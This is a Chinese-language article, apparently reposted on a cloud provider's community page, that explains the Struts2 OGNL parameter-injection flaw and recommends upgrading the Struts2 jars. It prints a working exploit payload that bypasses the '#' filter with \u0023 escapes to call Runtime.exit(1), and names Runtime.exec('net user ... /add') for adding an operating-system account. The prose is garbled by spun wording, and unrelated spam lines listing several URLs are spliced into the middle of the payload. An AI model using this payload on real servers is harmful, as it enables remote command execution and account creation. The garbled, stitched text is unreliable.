struts2漏洞原理及解決辦法

來源:互聯網
上載者:User

標籤:style   http   java   os   io   ar   cti   代碼   

1、原理

 

Struts2的中心是運用的webwork結構,處置 action時號碼大全經過調用底層的getter/setter辦法來處置http的參數,它將每個http參數聲明為一個ONGL(這裡是ONGL的介紹)語句。當關鍵詞挖掘工具咱們提交一個http參數:

 

?user.address.city=Bishkek&user[‘favoriteDrink‘]=kumys 

ONGL將它轉換為:

action.getUser().getAddress().setCity("Bishkek")  

action.getUser().setFavoriteDrink("kumys") 

 

這是經過ParametersInterceptor(參數過濾器)來履行的,運用使用者供給的HTTP參數調用 ValueStack.setValue()。 www.2cto.com

 

為了防備篡改伺服器端目標,XWork的ParametersInterceptor不允許參數名中呈現“#”字元,但假如運用了Java的 unicode字串表示\u0023,攻擊者就能夠繞過維護,修正維護Java辦法履行的值:

 

 

?

 

此處代碼有破壞性,請在測試環境履行,嚴禁用此種辦法進行歹意攻擊

?(‘\u0023_memberAccess[\‘allowStaticMethodAccess\‘]‘)(meh)=true&(aaa)((‘\u0023context[\‘xwork.MethodAccessor.denyMethodExecution\‘]\u003d\u0023foo‘)

 

-        indexRead arguments from command-line "http://www.3h5.cn"

-        indexRead arguments from command-line "http://www.shoudashou.com"

-        indexRead arguments from command-line "http://www.4lunwen.cn"

-        indexRead arguments from command-line "http://www.zx1234.cn"

-        indexRead arguments from command-line "http://www.majiangji168.cn"

-        indexRead arguments from command-line "http://www.penbar.cn"

-        indexRead arguments from command-line "http://www.whathappy.cn"

-        indexRead arguments from command-line "http://www.lunjin.net"

-        indexRead arguments from command-line "http://www.ssstyle.cn"

-        indexRead arguments from command-line "http://www.91fish.cn"(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)((‘\u0023rt.exit(1)‘)(\u0023rt\[email protected]@getRuntime()))=1 

 

 

 

 

轉義後是這樣:

 

?(‘#_memberAccess[‘allowStaticMethodAccess‘]‘)(meh)=true&(aaa)((‘#context[‘xwork.MethodAccessor.denyMethodExecution‘]=#foo‘)(#foo=new%20java.lang.Boolean("false")))&(asdf)((‘#rt.exit(1)‘)(#[email protected]@getRuntime()))=1

 

 

 

 

OGNL處置時終究的成果即是

 

java.lang.Runtime.getRuntime().exit(1);  //封閉程式,行將web程式封閉

 

相似的能夠履行

java.lang.Runtime.getRuntime().exec("net user 使用者名稱 暗碼 /add");//添加操作體系使用者,在有許可權的情況下能成功(在URL頂用%20更換空格,%2F更換/)

只需有許可權就能夠履行任何DOS指令。

 

2、解決辦法

網上許多文章都介紹了三種解決辦法,自己覺得將struts2的jar封裝更新到最新版別最簡單,不用更改任何程式碼,當前最新版別2.3.4

下載到的更新包中有許多jar包,我體系中首要用到以下幾個更換掉舊版別的:

commons-lang3-3.1.jar        (儲存commons-lang-2.6.jar)

javassist-3.11.0.GA.jar        (新加包)

ognl-3.0.5.jar            (更換舊版別)

struts2-core-2.3.4.1.jar    (更換舊版別)

xwork-core-2.3.4.1.jar        (更換舊版別)

 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.